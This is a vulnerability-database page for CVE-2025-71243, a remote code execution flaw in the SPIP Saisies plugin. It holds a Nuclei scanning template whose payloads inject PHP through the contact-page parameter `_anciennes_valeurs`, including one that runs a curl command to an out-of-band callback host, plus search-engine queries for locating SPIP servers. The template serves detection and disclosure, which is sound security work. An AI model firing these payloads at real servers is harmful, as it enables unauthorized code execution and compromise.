| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2025-71243 | 19 Feb 202614:58 | β | attackerkb | |
| Exploit for CVE-2025-71243 | 19 Feb 202616:13 | β | githubexploit | |
| CVE-2025-71243 | 19 Feb 202616:31 | β | circl | |
| SPIP 代η 注ε ₯ζΌζ΄ | 19 Feb 202600:00 | β | cnnvd | |
| CVE-2025-71243 | 19 Feb 202614:58 | β | cve | |
| CVE-2025-71243 SPIP Saisies Plugin < 5.11.1 Remote Code Execution | 19 Feb 202614:58 | β | cvelist | |
| SPIP Saisies Plugin Unauthenticated RCE | 9 Mar 202618:57 | β | metasploit | |
| CVE-2025-71243 | 19 Feb 202616:27 | β | nvd | |
| π SPIP Saisies 5.11.0 Remote Code Execution | 24 Feb 202600:00 | β | packetstorm | |
| π SPIP Saisies 5.11.0 Remote Code Execution | 24 Feb 202600:00 | β | packetstorm |
| Source | Link |
|---|---|
| vulnerability | www.vulnerability.circl.lu/vuln/cve-2025-71243 |
| chocapikk | www.chocapikk.com/posts/2026/spip-saisies-rce/ |
| github | www.github.com/Chocapikk/CVE-2025-71243 |
| vulnerabletarget | www.vulnerabletarget.com/VT-2025-71243 |
id: CVE-2025-71243
info:
name: SPIP Saisies - Remote Code Execution
author: omarkurt
severity: critical
description: |
SPIP Saisies plugin 5.4.0 through 5.11.0 contains a remote code execution caused by an unspecified flaw, letting attackers execute arbitrary code on the server, exploit requires no special conditions.
remediation: |
Update to version 5.11.1 or later.
impact:
Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
reference:
- https://vulnerability.circl.lu/vuln/cve-2025-71243
- https://chocapikk.com/posts/2026/spip-saisies-rce/
- https://github.com/Chocapikk/CVE-2025-71243
- https://vulnerabletarget.com/VT-2025-71243
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-71243
epss-score: 0.05126
epss-percentile: 0.9137
cwe-id: CWE-94
metadata:
verified: true
max-request: 3
vendor: spip
product: saisies
shodan-query: 'http.html:"SPIP"'
fofa-query: 'app="SPIP"'
tags: cve,cve2025,spip,rce,oast,vkev
variables:
rce_payload: "x'/><?php echo md5('{{randstr}}'); ?><input value='x"
oob_payload: "x'/><?php gethostbyname('{{interactsh-url}}'); ?><input value='x"
oob_curl: "x'/><?php system('curl+-s+{{interactsh-url}}'); ?><input value='x"
flow: http(1) && (http(2) || http(3) || http(4))
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(header, "Composed-By: SPIP")'
- 'contains(header, "X-Spip-Cache:")'
condition: or
internal: true
- method: GET
path:
- "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(rce_payload)}}"
matchers:
- type: dsl
dsl:
- 'contains(body, "{{md5(randstr)}}")'
- 'status_code == 200'
condition: and
- method: GET
path:
- "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_payload)}}"
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'status_code == 200'
condition: and
- method: GET
path:
- "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_curl)}}"
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100ceacaa1afed50aa38654b94b926d630cbcb002e66fa1ee6e4ed629fec80f6f36022100eed5f9d0a85515e2dcb9eae3084cb351dfc52bb137aa9fabe464d0104bfafb3b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation